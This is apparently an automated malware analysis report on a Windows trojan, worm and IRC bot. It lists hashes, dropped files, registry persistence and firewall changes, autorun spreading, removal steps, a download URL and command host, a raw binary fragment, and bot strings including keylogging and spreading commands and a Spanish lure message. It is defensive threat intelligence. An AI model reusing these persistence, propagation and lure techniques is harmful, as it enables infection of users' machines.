Trojan.Win32.Agent.amobq (Kaspersky), Trojan.GenericKD.2067268 (B) (Emsisoft), Trojan.GenericKD.2067268 (AdAware), mzpefinder_pcap_file.YR, GenericAutorunWorm.YR, GenericInjector.YR, GenericIRCBot.YR, TrojanDropperVtimrun.YR (Lavasoft MAS)Behaviour: Trojan-Dropper, Trojan, Worm, WormAutorun, IRCBot
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 34bede60c04552c0b0bcad13848048aa
SHA1: e9e2bbd8e7c287ff5656af24136721dde305c1e0
SHA256: 6c4e4620e2ca96f368cdcc0314fcb78c8efdefde4830828bccbe83456d2a1dc3
SSDeep: 3072:eoDuN20X5hzHfUSESmnl/4cOTPfQl/4cOTPfK:e3lLUSHtLTlLTK
Size: 135818 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2014-12-27 16:02:54
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
IRCBot | A bot can communicate with command and control servers via IRC channel. |
Process activity
The Trojan creates the following process(es):
Cyanide.exe:348
Cyanide.exe:1972
winsvc32.exe:344
Ganja145.exe:1436
NESbot.exe:612
NESbot.exe:1388
The Trojan injects its code into the following process(es):
msconfig.exe:1532
%original file name%.exe:772
hhh.exe:388
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process msconfig.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\msn[1].exe (15430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\google_cache2.tmp (9 bytes)
The process Cyanide.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\msconfig.exe (30 bytes)
The process %original file name%.exe:772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Cyanide.exe (60 bytes)
The process hhh.exe:388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\NESbot.exe (132 bytes)
The process Ganja145.exe:1436 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\hhh.exe (4984 bytes)
The process NESbot.exe:1388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\winsvc32.exe (601 bytes)
Registry activity
The process msconfig.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"Ganja145.exe" = "Win32 Cabinet Self-Extractor"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 CA 87 D0 FE C0 18 7D C5 D6 BC 2F 19 D9 8C A3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Cyanide.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 1B 90 B5 0C ED 82 71 0B E0 4D 73 C4 0D B0 82"
The process Cyanide.exe:1972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 13 39 0B 6D 45 02 5D 03 13 7E 88 83 64 1B 48"
The process %original file name%.exe:772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA DE 2F 50 06 CA B9 13 BD 6A 53 5C 75 18 CD 88"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"Cyanide.exe" = "Cyanide"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process hhh.exe:388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 17 E2 02 8A 7D 3F D8 66 F6 5E 6A 36 C2 73 EA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"NESbot.exe" = "NESbot"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process winsvc32.exe:344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B D8 6D 7E 7B AB A8 BE FD 12 70 E7 30 01 AC B9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process Ganja145.exe:1436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 04 94 A9 80 2D A8 DC 21 33 F5 F0 F4 AB 84 A3"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
The process NESbot.exe:612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 58 BE 2D E9 FB 0D 86 63 DC A2 62 85 F0 08 23"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process NESbot.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 E2 95 EC 3F 2E 23 17 7A 68 08 D3 4D 10 A5 64"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"winsvc32" = "winsvc32.exe"
Dropped PE files
MD5 | File path |
---|---|
d6152e2c63bb3e7d4b8f5abf9c76aecf | c:\Documents and Settings\"%CurrentUserName%"\Application Data\msconfig.exe |
d6152e2c63bb3e7d4b8f5abf9c76aecf | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Cyanide.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Cyanide.exe:348
Cyanide.exe:1972
winsvc32.exe:344
Ganja145.exe:1436
NESbot.exe:612
NESbot.exe:1388 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\msn[1].exe (15430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\google_cache2.tmp (9 bytes)
%Documents and Settings%\%current user%\Application Data\msconfig.exe (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cyanide.exe (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NESbot.exe (132 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\hhh.exe (4984 bytes)
%WinDir%\winsvc32.exe (601 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"winsvc32" = "winsvc32.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 66.72.12.25
Legal Copyright: Copyright (c) 2014
Legal Trademarks:
Original Filename: sokidsmfsdfsdfs.exe
Internal Name: sokidsmfsdfsdfs.exe
File Version: 66.72.12.25
File Description:
Comments:
Language: English (United States)
Company Name: Product Name: Product Version: 66.72.12.25Legal Copyright: Copyright (c) 2014Legal Trademarks: Original Filename: sokidsmfsdfsdfs.exeInternal Name: sokidsmfsdfsdfs.exeFile Version: 66.72.12.25File Description: Comments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 8192 | 49252 | 49664 | 4.34574 | 0480df25e05b678afc1c4fe541b6f140 |
.reloc | 65536 | 12 | 512 | 0.056519 | bf805fbb74b19f1e2e0bd1f15591e752 |
.rsrc | 73728 | 2588 | 3072 | 2.54019 | 5dfb93c34d83e1f1621fa635f022a43e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
0aaed1ed0c5752822e49e2fcac00792d
Network Activity
URLs
URL | IP |
---|---|
hxxp://icetelecoms.co.uk/msn/msn.exe | 212.1.215.86 |
root2.zapto.org | 90.147.119.154 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /msn/msn.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: icetelecoms.co.uk
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 12:39:48 GMT
Server: Apache
Last-Modified: Sun, 11 Jan 2015 18:17:04 GMT
ETag: "5b50f11-28000-50c64659b4208"
Accept-Ranges: bytes
Content-Length: 163840
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............C...C...Cu..C...C...C0..Cu..C...Cu..C...Cu..C...CRich...C................PE..L....Q.H............................\d..................................................................................................4...........................0...................................................0............................text............................... ..`.data...............................@....rsrc...............................@..@...H@...,..HM...,..HZ......Hd......Hn......Hy......H............ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.GDI32.dll.USER32.dll.COMCTL32.dll.VERSION.dll................................................................................................................................................................................................................................................................................................................|.w.|.wj..w.r.w{y.w...w...w.l.w...wBx.w...w.z.w...w.C.w......Dw....iZ.w.......|...|...|...|F..|_..|zO.||N.|.T.|8..|l].|K..|...|...|.).|...|...|...|...|...|l..|.[.|n .|Ld.|1..|!..|g..|.N.|...|.(.|d..|i8.|.`.|0..|E..|...|...|YM.|...|...|...|...|<U.|h!.|.`.|...|...|(..|S..|...|...|...|.P.|n .|;..|0%.|k#.|.].|.-.|...|...|...|...|...|#..|...|1..|...|./.|...|...|...|...|...|...|j>.|.I.|...|{..|...|V..|...|n..|'..|....u.E~..A~..B~ .A~..B~..B~].A~}.B~..A~..A~@.B~..B~..B~..A~..A~..B~..C~nCB~.BB~k.B~..E~}mE~V.
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
msconfig.exe_1532:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
WS2_32.dll
WS2_32.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
VkKeyScanA
VkKeyScanA
keybd_event
keybd_event
USER32.dll
USER32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
PRIVMSG
PRIVMSG
pong|cmd.exe###
pong|cmd.exe###
udp.stop
udp.stop
rndnick
rndnick
Cerebral botakeylog
Cerebral botakeylog
The One botspread.start
The One botspread.start
Skid placed botsregsrvs.exe
Skid placed botsregsrvs.exe
Older Botschngnick
Older Botschngnick
[FTP]
[FTP]
[Botkiller] Killing Process "%s", Type: "%s"
[Botkiller] Killing Process "%s", Type: "%s"
explorer.exe
explorer.exe
EXPLORER.EXE
EXPLORER.EXE
winlogon.exe
winlogon.exe
csrss.exe
csrss.exe
WINLOGON.EXE
WINLOGON.EXE
services.exe
services.exe
SERVICES.EXE
SERVICES.EXE
%s\%s%i%i.exe
%s\%s%i%i.exe
%s Downloading File From: %s, To: %s
%s Downloading File From: %s, To: %s
%s File Successfully Downloaded To: %s
%s File Successfully Downloaded To: %s
%s Failed To Download File Reason: Insufficient Memory
%s Failed To Download File Reason: Insufficient Memory
%s Failed To Download File Reason: Unknown
%s Failed To Download File Reason: Unknown
%s Successfully Executed: %s
%s Successfully Executed: %s
%s Failed To Execute File via Create Process Reason: Unknown
%s Failed To Execute File via Create Process Reason: Unknown
%appdata%\lsass.exe
%appdata%\lsass.exe
Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a
Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a
o.informate en el siguiente enlace
o.informate en el siguiente enlace
BeeSwarm.exe
BeeSwarm.exe
MAPI32.DLL
MAPI32.DLL
*.html
*.html
%s\%s
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%s:*:Enabled:%s
%s:*:Enabled:%s
Software\Microsoft\Windows\CurrentVersion\Run\
Software\Microsoft\Windows\CurrentVersion\Run\
%s %s
%s %s
%s %s "" "TsGh" :%s
%s %s "" "TsGh" :%s
%s %s %s
%s %s %s
%s %s :%s
%s %s :%s
%s :%s
%s :%s
ganja%s.exe
ganja%s.exe
%s Updating to: %s
%s Updating to: %s
%s Execution Failed!
%s Execution Failed!
%s Dowload Failed!
%s Dowload Failed!
%s Has Been Visited!
%s Has Been Visited!
Windows Live Messenger
Windows Live Messenger
Ganja%s.exe
Ganja%s.exe
[Download]: Executed Successfully
[Download]: Executed Successfully
